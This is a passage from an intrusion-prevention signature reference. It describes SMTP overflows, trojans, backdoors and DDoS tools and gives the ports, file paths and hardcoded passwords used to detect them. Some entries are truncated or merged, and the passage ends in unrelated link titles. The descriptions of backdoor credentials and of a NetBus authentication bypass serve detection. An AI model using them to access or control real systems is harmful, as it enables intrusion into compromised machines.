Signature Description: URLMON.DLL is a library used by Microsoft Internet Explorer. Microsoft Internet Explorer
5.01, 5.5 and 6.0 are vulnerable to buffer over flow. A remote attacker could exploit this vulnerability by sending long
argument to content-encoding field. A successful exploitation of this attack will allow attacker to execute arbitary
command. Apply a patch as described in MS03-015.
291
Signature ID: 2242
SMTP Content-Type overflow attempt vulnerability
Signature Description: URLMON.DLL is a library used by Microsoft Internet Explorer. Microsoft Internet Explorer
5.01, 5.5 and 6.0 are vulnerable to buffer over flow. A remote attacker could exploit this vulnerability by sending a
long argument to content-type field. A successful exploitation of this attack will allow attacker to execute arbitary
commands. Apply a patch as described in MS03-015.
Signature ID: 2243
SMTP From command overflow attempt
Signature Description: Mail Servers are reportedly prone to a remotely exploitable stack-based buffer overrun
vulnerability.This issue is exposed if header syntax checking has been enabled in the agent and may be triggered by a
malicious e-mail.If this condition were to be exploited, it would result in execution of arbitrary code in the context of
the mail transfer agent. Otherwise, the agent would crash when handling malformed syntax in an e-mail message.Mail
System Versions Exim 4 and before 4.33 are vulnerable to this attack.
Signature ID: 2244
SMTP Mail Transfer Agent MAIL FROM Overflow Attempt Vulnerability
Signature Description: This rule tries to detect an attempt to overflow the MAIL FROM field in SMTP header.
Applications like Exim version 4.32 is vulnerable to stack-based buffer overflow, caused by improper bounds checking
in the SMTP header. A remote attacker could exploit this vulnerability to overflow a buffer and possibly execute
arbitrary code on the vulnerable system. Upgrade to the latest version of exim(3.35 or later).
Signature ID: 2245
SMTP ReplyTo command overflow vulnerability
Signature Description: This rule tries to detect an attempt to overflow the ReplyTo field in SMTP header. Exim version
Signature ID: 2246
SMTP Sender command overflow vulnerability
Signature Description: This rule tries to detect an attempt to overflow the SENDER field in SMTP header. Exim
version 4.32 is vulnerable to stack-based buffer overflow, caused by improper bounds checking in the SMTP header. If
the headers_check_syntax setting is enabled in the exim.conf configuration file, which is not the default setting, a
remote attacker could exploit this vulnerability to overflow a buffer and possibly execute arbitrary code on the
vulnerable system. Upgrade to the latest version of exim(3.35 or later) to resolve this issue.
292
Signature ID: 2247
SMTP To command overflow vulnerability
Signature Description: This rule tries to detect an attempt to overflow the TO field in SMTP header. Exim version 4.32
is vulnerable to stack-based buffer overflow, caused by improper bounds checking in the SMTP header. If the
Signature ID: 2248
Microsoft SSL PCT buffer overflow vulnerability
Signature Description: A buffer overrun vulnerability exists in the Private Communications Transport (PCT) protocol,
which is part of the Microsoft Secure Sockets Layer (SSL) library. Only systems that have SSL enabled, and in some
cases Windows 2000 domain controllers, are vulnerable. An attacker who successfully exploited this vulnerability
could take complete control of an affected system.All programs that use SSL could be affected. Although SSL is
generally associated with Internet Information Services by using HTTPS and port 443, any service that implements
SSL on an affected platform is likely to be vulnerable. In this case PCT should work for SMTP (STARTTLS). This
includes but is not limited to, Microsoft Internet Information Services 4.0, Microsoft Internet Information Services 5.0,
Microsoft Internet Information Services 5.1, Microsoft Exchange Server 5.5, Microsoft Exchange Server 2000,
Microsoft Exchange Server 2003, Microsoft Analysis Services 2000 (included with SQL Server 2000), and any thirdparty programs that use PCT (MS04-011)
Signature ID: 2249
Microsoft Windows Collaboration Data Objects buffer overflow Vulnerability
Signature Description: Collaboration Data Objects (CDO) is a Component Object Model (COM) component designed
to, among other functions, make it easier to write programs that create or change Internet mail messages. Microsoft
Windows 2000, Windows XP, Windows Server 2003 and Microsoft Exchange 2000 Server could allow a remote
attacker to execute arbitrary code on the system, caused by a buffer overflow in the Collaboration Data Objects (CDO).
This rule will triggers when an attempt is made to send a long argument to from header field.
Signature ID: 2250
Microsoft Windows Collaboration Data Objects buffer overflow Vulnerability
Signature Description: Collaboration Data Objects (CDO) is a Component Object Model (COM) component designed
to, among other functions, make it easier to write programs that create or change Internet mail messages. Microsoft
Windows 2000, Windows XP, Windows Server 2003 and Microsoft Exchange 2000 Server could allow a remote
attacker to execute arbitrary code on the system, caused by a buffer overflow in the Collaboration Data Objects (CDO).
This rule will triggers when an attempt is made to send a long argument to content-type header field.
Signature ID: 2251
Microsoft Exchange Server X-LINK2STATE Buffer Overflow Vulnerability
293
Signature Description: SMTP extended verbs are an addition of new functionality to the SMTP protocol. Microsoft
Exchange uses one such extended verb "X-LINK2STATE" to communicate routing and other Exchange-specific
information among Exchange servers in an Exchange environment. A buffer overflow error exists in
SvrAppendReceivedChuck() function of the xlsasink.dll library of Microsoft Exchange Server. In this function, the
data received in an X-LINK2STATE command is not sufficiently validated before being copied into a buffer.
Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code or cause a denial of
service.
Signature ID: 2996
SMTP command with command length exceeding 512 bytes detected.
CVE-1999-0231 CVE-2005-0560 Nessus:
10047,10050,10435,10419,10256,10260,10284,10324,10042,10353,10136,10162,10254,10438
from one server to another. This rule will trigger when the command length exceeding 512 bytes. The successful
exploitation of this will cause to crashing the servers.
Signature ID: 2997
Smtp Header Length exceeding configured maximum limit
from one server to another. This rule will trigger when the Header Length is exceeding configured maximum limit. The
successful exploitation of this will cause to crash the server.
Signature ID: 2998
Smtp Mime Header exceeding configured maximum limit
one server to another. This rule will trigger when the Mime Header Length is exceeding configured maximum limit.
The successful exploitation of this will cause to crash the server.
Signature ID: 2999
Smtp Data has more than maximum configured number of Boundarys.
one server to another. This rule will trigger when the SMTP Data is exceeding maximum configured number of
boundaries. The successful exploitation of this will cause to crash the server.
Signature ID: 3001
NetSphere presence detection
Industry ID: CVE-1999-0660 Nessus:
10005,10024,10152,10151,10409,10053,10270,10501,10288,10307,10350,10920,10921
Signature Description: Trojan horses are malicious program which usually hacker used to bind it with some other
294
application or process like, Greeting cards or Games etc.When the user opens or triggers, then the malicious program
will sit in the users computer and tries to open a backdoor silently and give a way to an attacker to take full control of
the user and can exploit the user. This rule tries to detect Backdoor NetSphere. A cracker may use it to steal your
password or prevent you from working properly. NetSphere typically uses TCP ports 30100 to 30102.
Signature ID: 3004
PC Anywhere TCP Destination Port 5631 vulnerability detection
Nessus: 10794
Signature Description: PcAnywhere is a pair of computer programs by Symantec which allows a user of the
pcAnywhere remote program on a computer to connect to a personal computer running the pcAnywhere host if both are
connected to the internet or the same LAN and the password is known. pcAnywhere runs on several platforms,
including Microsoft Windows, Linux, Mac OS X, and Pocket PC. pcAnywhere application is vulnerable to a brute
force attack. A successful exploitation of this vulnerability allows an attacker to steal your password or prevent you
from working properly.
Signature ID: 3005
BackOrifice trojan attack
10024,10152,10151,10409,10053,10270,10501,10288,10307,10350,10920,10921
Signature Description: BackOrifice is trojan which allows an intruder to take the control of the remote computer.Once
it installed on a system, BO2K can transmit information about the machine over the network, "snooping" the screen and
keyboard of the machine. A cracker may use it to steal your passwords, modify your data, and prevent you from
working properly.
Signature ID: 3008
Backdoor CDK detected on TCP destination port 15858
10036,10024,10152,10151,10409,10053,10270,10501,10288,10307,10350,10920,10921
Signature Description: The remote host appears to be running CDK, which is a backdoor that can be used to control
your system. To use it, a cracker just has to connect to this port, and send the password 'ypi0ca' It is very likely that this
host has been compromised.
Signature ID: 3024
Backdoor DeepThroat 3.1
10036,10024,10152,10151,10409,10053,10270,10501,10288,10307,10350,10920,10921
Signature Description: This backdoor allows anyone to partially take the control of the remote system. A cracker may
use it to steal your password or prevent you from working properly. It specifically works on Windows 95, 98 and NT
platforms. Released in 1998 by the Dark Light Corporation, other variants or versions include DeepThroat 1.0,
DeepThroat 2.0, DeepThroat 2.1, DeepThroat 3.0, DeepThroat 3.1, DeepThroat 3.1 Lite, Win32.DeepThroat, DTV2,
DTV3, BackDoor-J.srv, BackDoor-J.cli, Backdoor.DeepThroat.
295
Signature ID: 3030
Trojan GateCrasher detected
10093,10024,10152,10151,10409,10053,10270,10501,10288,10307,10350,10920,10921
Signature Description: Backdoor Gate crasher 1.2 is a Trojan that opens up a backdoor program that, once installed on
a system, permits unauthorized users to remotely manage files, alter user interface, shutdown the system, etc. Gate
Crasher typically runs from the server file "c:\WINDOWS\system.exe" over ports 6969 and 6970 via TCP. GateCrasher
disguises itself as a TCP/IP booster and allows a 3rd party to take over the infected computer with the same rights as
the user. It has also been designed to be embedded in a Microsoft Word 97 document.
Signature ID: 3031
Presence of the backdoor GirlFriend detected
10093,10094,10024,10152,10151,10409,10053,10270,10501,10288,10307,10350,10920,10921
Signature Description: Backdoor GirlFriend is a Trojan that opens up a backdoor program,once installed on a system,
permits unauthorized users to remotely extract passwords, control user interface, spoof system messages, etc.
GirlFriend typically runs from the server file "C:\WINDOWS\Windll.exe" over ports 21554 and 22554 via TCP.
Signature ID: 3033
The presence of the virus Kuang2 detected
10132,10024,10152,10151,10409,10053,10270,10501,10288,10307,10350,10920,10921
Signature Description: Kuang2 the Virus is a program that infects all the executables on the system, as well as set up a
server that allows the remote control of the computer. The client program allows files to be browsed, uploaded,
downloaded etc on the infected machine. The client program also can execute programs on the remote machine. Its
aliases is W32/Weird-10240.
Signature ID: 3034
Backdoor Lion worm vulnerability
Nessus: 10646
Signature Description: Lion worm infects the system (using bind exploit) and feeds it a web page. It also again sends
out an email with the /etc/passwd and /etc/shadow to [email protected]. It infects Linux machines with the BIND
DNS server running. It is known to infect BIND versions 8.2, 8.2-P1, 8.2.1, 8.2.2-Px. BIND 8.2.3-REL and BIND 9 are
not vulnerable. The Lion worm spread via an application called pscan. randb then generates random class B networks
probing TCP port 53. Ports 60008/tcp and 33567/tcp get a backdoor root shell (via inetd, see /etc/inetd.conf), and a
trojaned version of ssh gets placed on 33568/tcp. Syslogd is killed, so the logging on the system can't be trusted. This
signature will trigger when malicious traffic passes through port 60008/Tcp.
Signature ID: 3035
Nessus: 10646
Signature Description: Lion worm infects the system (using bind exploit) feeds it a web page. It also again sends out an
email with the /etc/passwd and /etc/shadow to [email protected]. It infects Linux machines with the BIND DNS
296
server running. It is known to infect BIND version(s) 8.2, 8.2-P1, 8.2.1, 8.2.2-Px. BIND 8.2.3-REL and BIND 9 are not
vulnerable. The Lion worm spread via an application called pscan. randb then generates random class B networks
probing TCP port 53. Ports 60008/tcp and 33567/tcp get a backdoor root shell (via inetd, see /etc/inetd.conf), and a
trojaned version of ssh gets placed on 33568/tcp. Syslogd is killed, so the logging on the system can't be trusted. This
rule hits for the attack pattern having returned values of user identification numbers flowing towards the destination
port 60008.
Signature ID: 3036
The presence of Lion worm on port 33567
Nessus: 10646
Signature Description: The lion worm spawns shells running on extra port and a copy of SSH running on port 33568. It
sends an email to [email protected] with /etc/passwd, /etc/shadow as attachments. It randomly creates class-B network
address and scans the network for vulnerable hosts. once it exploits a host, it installs the t0rm root kit. when lion worm
got installed in the system, the ports 60008/tcp and 33567/tcp get bound to root shell and the Trojan version of SSH
will be bound to 33568/tcp. This rule hits when attack pattern found on the traffic towards 33567 destination port.
Signature ID: 3037
Nessus: 10646
Signature Description: Lion worm infects the system (using bind exploit) and sets up to listen on port 27374 and feeds
it a web page. It also again sends out an email with the /etc/passwd and /etc/shadow to [email protected]. It infects
Linux machines with the BIND DNS server running. It is known to infect BIND version(s) 8.2, 8.2-P1, 8.2.1, 8.2.2-Px.
BIND 8.2.3-REL and BIND 9 are not vulnerable. The Lion worm spread via an application called pscan. randb then
generates random class B networks probing TCP port 53. Ports 60008/tcp and 33567/tcp get a backdoor root shell (via
inetd, see /etc/inetd.conf), and a trojaned version of ssh gets placed on 33568/tcp. Syslogd is killed, so the logging on
the system can't be trusted. This rule hits for the attack pattern having returned values of user identification numbers
flowing towards the destination port 33567.
Signature ID: 3038
Nessus: 10646
Signature Description: Lion worm infects the system (using bind exploit) and sets up to listen on port 27374 and feeds
it a web page. It also again sends out an email with the /etc/passwd and /etc/shadow to [email protected]. It infects
Linux machines with the BIND DNS server running. It is known to infect BIND version(s) 8.2, 8.2-P1, 8.2.1, 8.2.2-Px.
BIND 8.2.3-REL and BIND 9 are not vulnerable. The Lion worm spread via an application called pscan. randb then
generates random class B networks probing TCP port 53. Ports 60008/tcp and 33567/tcp get a backdoor root shell (via
inetd, see /etc/inetd.conf), and a trojaned version of ssh gets placed on 33568/tcp. Syslogd is killed, so the logging on
the system can't be trusted. This rule hits for the attack pattern towards the destination port 33568.Lion worm runs SSH
server on these ports.
Signature ID: 3042
DDos Mstream Tool agent via TCP
Signature Description: The mstream program is a distributed denial of service tool based on the "stream.c" attack. This
tool includes a "master controller" and a "zombie." The master controller is the portion of the tool that controls all of
the zombie agents. An attacker connects to the master controller using Telnet to control the zombies. Communications
297
between the client, master, and zombie are not encrypted. It is much like previously known DDOS tools such as
Trinoo. The version that is in wild uses TCP port 6723, and the password is "sex".
Signature ID: 3043
DDoS Mstream Tool Login
Signature Description: The mstream program is a distributed denial of service tool based on the "stream.c" attack. This
tool includes a "master controller" and a "zombie." The master controller is the portion of the tool that controls all of
the zombie agents. An attacker connects to the master controller using Telnet to control the zombies. Communications
between the client, master, and zombie are not encrypted. It is much like previously known DDOS tools such as
Trinoo. It workS on Port 15104 via TCP.
Signature ID: 3044
Backdoor NetBus
10151,10024,10152,10409,10053,10270,10501,10288,10307,10350,10920,10921
Signature Description: This rule tries to detect the Backdoor NetBus. NetBus allows anyone to partially take the
control of the remote system. A cracker may use it to steal your password or prevent you from working properly. This
backdoor typically runs over the port 12345 and 12346 over TCP
Signature ID: 3045
Backdoor NetBus 1.x Traffic on Port 20034
10151,10024,10152,10409,10053,10270,10501,10288,10307,10350,10920,10921
Signature Description: NetBus and NetBusPro are two of many backdoor programs. Netbus 1.x server is able to be
connected to without a password. It open two clients that are compatable with the server being connected to, With one
client connect to the server and wait until the password screen appears. Once this happens connect to the same server
with the other client and it will not ask you for a password, this is done because the server thinks you are already
connected and notices the same IP connected to the same server allowing you to connect. This rule tries to detect the
Backdoor NetBus 1.x. It allows anyone to partially take the control of the remote system. A cracker may use it to steal
your password or prevent you from working properly. It typically runs over ports 20034 via TCP.
Signature ID: 3047
NetBus 1.x getInfo request
10151,10024,10152,10409,10053,10270,10501,10288,10307,10350,10920,10921
Signature Description: NetBus and NetBusPro are two of many backdoor programs. Netbus 1.x server is able to be
connected to without a password. It open two clients that are compatable with the server being connected to, With one
client connect to the server and wait until the password screen appears. Once this happens connect to the same server
with the other client and it will not ask you for a password, this is done because the server thinks you are already
connected and notices the same IP connected to the same server allowing you to connect. This rule tries to detect the
Backdoor NetBus 1.x. It allows anyone to partially take the control of the remote system. A cracker may use it to steal
your password or prevent you from working properly. It typically runs over ports 12345 and 12346 via TCP.
298
Signature ID: 3049
Backdoor Netbus Pro Server
10152,10024,10151,10409,10053,10270,10501,10288,10307,10350,10920,10921
Signature Description: This rule tries to detect Backdoor NetBus Pro. NetBus Pro is a Trojan (in reality, it is an
administrative tool) that opens up a backdoor program that, once installed on a system, permits unauthorized users to
remotely perform a variety of operations, such as changing the registry, executing commands, starting services, listing
files, and uploading or downloading files. NetBus Pro typically runs over ports 20034 via TCP.
Signature ID: 3050
Request to Netbus Pro Server
10152,10024,10151,10409,10053,10270,10501,10288,10307,10350,10920,10921
Signature Description: NetBus is a remote administration tool that can be used for malicious purposes (like backdoor),
such as sniffing what the user is typing, its passwords and so on. A cracker may have installed it to control hosts on
your network.
Signature ID: 3052
Backdoor Portal of Doom Server
10186,10024,10152,10151,10409,10053,10270,10501,10288,10307,10350,10920,10921
Signature Description: Portal of Doom is a backdoor, which allows anyone to partially take the control of the remote
system. Once infected with this backdoor, the system runs the server executable "ljsgz.exe" to take commands from
attacker. When this program executes, the program performs a specific set of actions. This usually works toward the
action of allowing the trojan to survive on a system and open up a backdoor. Another symptom of this Trojan is it sends
a message every two seconds reading ""Keep Aliveeeeeeee". This signature triggers when the attack pattern arrives in
the incoming request traffic.
Signature ID: 3053
Backdoor Portal of Doom Server(Reply)
Industry ID: CVE-2000-0138 CVE-1999-0660 Nessus:
10350,10024,10152,10151,10409,10053,10270,10501,10288,10307,10920,10921,10501
Signature Description: Portal of Doom is a backdoor, which allows anyone to partially take the control of the remote
system. Once infected with this backdoor, the system runs the server executable "ljsgz.exe" to take commands from
attacker. When this program executes, the program performs a specific set of actions. This usually works toward the
action of allowing the trojan to survive on a system and open up a backdoor. Another symptom of this Trojan is it sends
a message every two seconds reading ""Keep Aliveeeeeeee". This signature triggers when the attack pattern arrives in
the outbound response traffic.
Signature ID: 3054
Shaft DDoS Traffic from handler to agent
10350,10024,10152,10151,10409,10053,10270,10501,10288,10307,10920,10921,10501
Signature Description: Shaft is a DDoS tool consists of handlers, clients and agents. Agents are programs that are
299
planted in compromised systems. Attacker does the remote control via a simple telnet connection (client) to the handler
(20432/tcp). Handlers work as master to order agents to launch DoS. Shaft agents are capable of doing UDP, TCP
SYN, ICMP packet flooding, or the combination of all three, based on the commands from Handlers. Communication
between handlers and agents is achieved using the unreliable IP protocol UDP (18753/udp).This rule triggers when a
Shaft handler sends a “are you alive” command query to the agent.
Signature ID: 3055
SyGate un-authenticated remote administration vulnerability
Signature Description: Sybergen Sygate is a proxy for sharing internet connection that uses network Address
Translation (NAT) and virtual interfaces to share an internet connection among multiple PCs. Sybergen SyGate 2.0 to
3.11(inclusive) includes an undocumented feature called the Remote Administration Engine (RAE). This feature opens
port 7323, and provides a user interface to any incoming telnet session. This interface requires no authentication of any
kind, and includes the ability to stop the SyGate service, display various statistics on the SyGate process, and display
all TCP or UDP connections, allowing an attacker to generate a map of the internal network.
Signature ID: 3057
Trojan Trinity v3 Server Response
Signature Description: A distributed denial of service attack (DDoS) occurs when multiple compromised systems flood
the bandwidth or resources of a targeted system, usually one or more web servers. Trinity is a distributed denial of
service Trojan agent for Linux that is controlled by IRC (Internet Relay Chat) to make your system attack another
network. The Trinity agent connects to an Undernet IRC server and waits for commands to be sent to the channel. The
Trinity trojan can perform 8 different types of flood attacks: UDP flood, Fragment flood, SYN flood, RST flood,
random flags flood, ACK flood, establish flood, and null flood.
Signature ID: 3059
Response from Backdoor/trojan Trin00 server
10288,10024,10152,10151,10409,10053,10270,10501,10307,10350,10920,10921,10501
Signature Description: Trinoo daemons were originally found in binary form on a number of Solaris 2.x systems,
which were identified as having been compromised by exploitation of buffer overrun bugs in the RPC services "statd",
"cmsd" and "ttdbserverd". It is an UDP based, access-restricted remote command shells, used in conjunction with
sniffers to automate recovering sniffer logs. This signature detects Trin00 server responses.
Signature ID: 3061
VNC over HTTP or Backdoor Y3K RAT 1.6 Detected
Nessus: 10758
Signature Description: This signature detects trakkic on ports that are known to be used by VNC service or Y3K RAT
trojan. Virtual Network Computing (VNC) is a graphical desktop sharing system which uses the RFB protocol to
remotely control another computer. It transmits the keyboard and mouse events from one computer to another, relaying
the graphical screen updates back in the other direction, over a network. Y3K RAT is one of many backdoor programs
that attackers can use to access your computer system without your knowledge or consent. With the Y3K RAT
backdoor, an attacker can shut down the computer, log keystrokes, access files on the computer. Traffic on these ports
must be monitored.
300
Signature ID: 3062
VNC Through HTTP Traffic Detected
Nessus: 10758
Signature Description: VNC (Virtual Network Computing) software makes it possible to view and fully-interact with
one computer from any other computer or mobile device anywhere on the Internet. VNC software is cross-platform,
allowing remote control between different types of computer. For ultimate simplicity, there is even a Java viewer, so
that any desktop can be controlled remotely from within a browser without having to install software. Using this, VNC
permits a console to be displayed remotely.
Signature ID: 3063
VNC HTTP Traffic with vncviewer.class Detected
Nessus: 10758
Signature Description: VNC (Virtual Network Computing) software makes it possible to view and fully-interact with
one computer from any other computer or mobile device anywhere on the Internet. VNC software is cross-platform,
allowing remote control between different types of computer. For ultimate simplicity, there is even a Java viewer, so
that any desktop can be controlled remotely from within a browser without having to install software. Using this, VNC
permits a console to be displayed remotely.Tthis signature detects the vncviewer class access.
Signature ID: 3065
Request to Trin00 for Windows server
10307,10024,10152,10151,10409,10053,10270,10501,10288,10350,10920,10921,10501
Signature Description: Trinoo daemons were originally found in binary form on a number of Solaris 2.x systems,
which were identified as having been compromised by exploitation of buffer overrun bugs in the RPC services "statd",
"cmsd" and "ttdbserverd". It is an UDP based, access-restricted remote command shells, used in conjunction with
sniffers to automate recovering sniffer logs. This signature detects Trin00 server requests.
Signature ID: 3066
Backdoor WinSATAN server Login using "uyhw6377w"
Nessus: 10316
Signature Description: The WinSATAN trojan claims to be a security application called WinSATAN. However, none
of the software's three functions works properly. The Trojan is written in Delphi and has a hard coded list of IRC
Servers. The Trojan runs on start up and tries to connect to the IRC servers every few seconds until successful. The
connection remains even when the program is closed and this activity cannot be detected using Task Manager or by
seeing applications on the task bar. This trojan affects only Windows 3.x and Windows 9X. This signature detects use
of a hard coded user name in the trojan.
Signature ID: 3067
Backdoor WinSATAN server Login
Nessus: 10316
Signature Description: The WinSATAN trojan claims to be a security application called WinSATAN. However, none
of the software's three functions works properly. The Trojan is written in Delphi and has a hard coded list of IRC
Servers. The Trojan runs on start up and tries to connect to the IRC servers every few seconds until successful. The
connection remains even when the program is closed and this activity cannot be detected using Task Manager or by
301
seeing applications on the task bar. This trojan affects only Windows 3.x and Windows 9X. This signature detects use
of a hard coded password in the trojan.
Signature ID: 3068
PC Anywhere TCP
Nessus: 10794
Signature Description: PcAnywhere is a pair of computer programs by Symantec which allows a user of the
pcAnywhere remote program on a computer to connect to a personal computer running the pcAnywhere host if both are
connected to the internet or the same LAN and the password is known. pcAnywhere runs on several platforms,
including Microsoft Windows, Linux, Mac OS X, and Pocket PC. This service could be targeted by an attacker to
partially take the control of the remote system. An attacker can obtain the credentials necessary to log in through a
brute force attack or by other means. The attacker may then use it to steal your mail password, etc. or prevent you from
working properly.
Signature ID: 3088
Backdoor AOL Admin for Windows
Signature Description: The AOL Admin backdoor is one of many backdoor programs that attackers can use to access
your Windows 9x and NT computer system without your knowledge or consent. With the AOL Admin backdoor, an
attacker can execute programs, delete files, send Instant Messages to an AOL user, monitor Instant Messages that you
receive and send email from your AOL account.
Signature ID: 3091
Backdoor Backdoor2.03 for Windows
Signature Description: Backdoor Backdoor2.03 is a poorly written trojan horse for Windows 9x/NT. This trojan horse
allows a number of remote operations to be performed on the infected hosts and poses a significant threat. By default
this backdoor runs on port 1999.
Signature ID: 3092
Biggluck Backdoor for Windows
Signature Description: The Biggluck backdoor infects Windows 9x, NT, XP, 2000, 2003 systems and allows attackers
to retrieve Dial-Up Networking accounts and their passwords via a remote telnet connection to the system.
Signature ID: 3093
Blazer 5 Backdoor for Windows
Signature Description: 'Blazer5', which is also known as 'Trojan Sockets.cli' or 'Backdoor.Kamikaze', is a Trojan that
once installed on a system, permits unauthorized users to remotely perform a variety of operations, such as changing
the registry, executing commands, starting services, listing files, and uploading or downloading files. Blazer5 operates
from the server file "C:\WINDOWS\SYSTEM\MSchv32.exe" over port 5000 via TCP. This backdoor operates on
Microsoft Windows 9X, NT, XP, 2000, 2003 server operating systems.
302
Signature ID: 3094
Back Orifice 2000 Backdoor detection
Signature Description: Back Orifice 2000 or 'BO2k' is a computer program designed for remote system administration.
It enables a user to control a computer running the Microsoft Windows operating system from a remote location. Back
Orifice 2000 is widely regarded as a backdoor program. This classification is justified by the fact that Back Orifice
2000 is often installed by a Trojan horse by a malicious user without the knowledge of the systems administrator.
System administrators are expected to ignore this alert when they are using Back Orifice 2000 for administration of
their system. This signature detects Back Orifice 2000 traffic on TCP Ports 54320-54321.
Signature ID: 3095
their system. This signature detects Back Orifice 2000 traffic on TCP Port 31337.
Signature ID: 3096
their system. This signature detects Back Orifice 2000 traffic on TCP Port 1025.
Signature ID: 3097
Bugs Backdoor for Windows 9x and NT
Signature Description: Backdoor 'Bugs', also known as 'W32/Backdoor.Feap', 'Backdoor.Feap' and 'Backdoor-BI', is a
backdoor program that permits unauthorized malicious users to remotely perform a variety of operations on the host
system without the administrator's knowledge. These operations include desktop appearance changes, changing the
registry, executing commands, add or remove start up programs, starting services, listing, uploading or downloading of
files and retrieval of shared information from programs using Dynamic Data Exchange. Bugs runs from the server file
"C:\WINDOWS\SYSTEM\SYSTEMTR.EXE" over port 2115 via TCP and affects Microsoft Windows 9x/NT.
Signature ID: 3098
Backdoor Coma detection
Signature Description: Coma is a backdoor for Windows 9x that allows a remote attacker to take control of a system
once it has been infected. Control includes allowing the attacker to retrieve system information, execute programs, use
FTP to transfer files, and log keystrokes. This backdoor is known to infect only windows 9x based systems.
303
Signature ID: 3099
Cow Backdoor for Windows 9x detection
Signature Description: 'Trojan cow' 1.0, also known as 'Backdoor.Cow' or 'Cow backdoor' is a Trojan that once
installed on a system, permits unauthorized remote users to manage files, manage programs, alter the user interface,
shutdown windows, etc. Trojan Cow typically operates from the server file "C:\WINDOWS\Syswindow.exe" over port
2001 via TCP. This trojan is known to be used on Microsoft, Windows 9x/ME/NT/2000/XP based systems.
Signature ID: 3100
Backdoor DeltaSource for Windows
Signature Description: Backdoor DeltaSource is a Trojan that opens up a backdoor program. It affects all Microsoft
Windows versions. once it installed on a system, it permits unauthorized users to remotely ping, manipulate programs,
snoop irc traffic, manipulate the user interface, etc. DeltaSource typically runs on port 47262 via UDP.This signature
detects UDP traffic to common Delta Source ports.
Signature ID: 3101
Doly Backdoor for Windows detection
Signature Description: A backdoor is a program used for bypassing normal authentication, securing remote access to a
computer while attempting to remain undetected. Doly is a backdoor for Windows 9x and NT systems that allows
remote attackers to connect to the infected computer over the Internet and log your keystrokes, start an FTP server,
capture your screen, and shut down or reboot the infected computer.
Signature ID: 3102
Fore Backdoor For Windows 9x
computer while attempting to remain undetected. Fore backdoor performs standard backdoor functions that include
execution of programs, retrieval of system information, restarting the computer, retrieval of Dial-Up Networking
accounts and passwords, creation, retrieval, and manipulation of files using a built-in FTP server, opening and closing
of CD-ROM drive. Fore typically uses TCP ports 50766 and 21.
Signature ID: 3103
Backdoor Frenzy 1.0.1/2000 detection
computer while attempting to remain undetected. The Frenzy backdoor allows a remote attacker to perform actions like
opening and closing the CD-ROM tray, making the computer beep, hiding the task bar, moving the mouse pointer, and
restarting the computer.
Signature ID: 3104
HackersParadise Backdoor detection
computer while attempting to remain undetected. The Hacker's Paradise backdoor can allow a user to access files on
hard drives, manipulate the appearance of the desktop, and retrieve the RAS passwords (Only on Windows NT based
systems). This backdoor is know to infect Windows 9x/NT/2000/XP/2003 based systems.
304
Signature ID: 3105
HVL-RAT backdoor (BF Evolution) for Windows detection
Signature Description: The 'HVL-RAT' backdoor, which is also known as 'B.F.Evolution', allows remote attackers to
take control of a user's America Online session. It also streams audio from the microphone on the infected system to the
attacker and allows for reboot or shut down the infected machine. Most of its features are based on AOL, such as
spying in chat rooms and reading instant messages of users on affected systems. When HVL-RAT starts, it sends an email to [email protected] giving away the IP address, and the AOL username and password on the infected system.
This backdoor is known to infect Windows 9X/NT/2000/XP/2003 based system.
Signature ID: 3106
Maverick's Matrix Backdoor detection
computer while attempting to remain undetected. Backdoor Mavericks matrix 1.0 is a Trojan that permits unauthorized
users to remotely perform a variety of operations including access files on the infected computer, retrieve passwords,
start and stop an FTP server on the infected system. Mavericks Matrix typically runs over port 1269 via TCP and is
known to infect Windows 9x based systems.
Signature ID: 3108
Netmonitor Backdoor detection
Signature Description: NetMonitor is a backdoor for Windows 9x/NT that allows an attacker to have remote access to
the file system, registry, and desktop of an infected system. In addition to these functions, the program also allows an
attacker to send messages to the console and shut down the infected system.
Signature ID: 3109
PhaseZero Backdoor detection
computer while attempting to remain

Signature ID - Hewlett Packard Enterprise Support Center

Transcription

Similar documents

2015 Historic Autographs Celebrity 2 Cut

Please our employment application

Blackmon Mooring Contract

G.P.A. Incentive Application - Hopland Band of Pomo Indians

1 Selling Innovative products

LokSeam® - ABC Metal Roofing

Sunday 8am • Aug. 7, 2016 Q`emiln Park, Post Falls, ID .5K Swim

Enrollment Packet - Lil` Rascals Academy

- Canadel

restaurant